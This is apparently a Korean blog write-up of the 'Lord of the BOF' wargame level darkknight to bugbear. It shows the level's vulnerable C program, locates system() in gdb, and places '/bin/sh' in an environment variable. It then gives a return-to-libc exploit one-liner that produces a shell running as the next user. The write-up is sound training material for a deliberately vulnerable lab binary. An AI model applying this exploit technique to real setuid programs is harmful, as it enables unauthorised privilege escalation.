LOB darkknight => bugbear

c0wb3ll ㅣ 2020. 4. 2. 12:54

LOB darkknight => bugbear


[darkknight@localhost darkknight]$ cat bugbear.c
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");

    if(argv[1][47] == '\xbf')
        printf("stack betrayed you!!\n");

    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);

음 RTL 문제다.


(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

system 주소를 알아내고

[darkknight@localhost tmp]$ export bin="/bin/sh"

환경변수에 /bin/sh 문자열 올려주고

[darkknight@localhost tmp]$ ./zugbear 
bin address is 0xbffffef0[darkknight@localhost tmp]$ 
[darkknight@localhost tmp]$ ./bugbear `python -c "print 'A'*44 + '\xe0\x8a\x05\x40' + 'AAAA' + '\xf0\xfe\xff\xbf'"`

환경변수 주소 알아내서 공격하면 된다.

bash$ id    
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)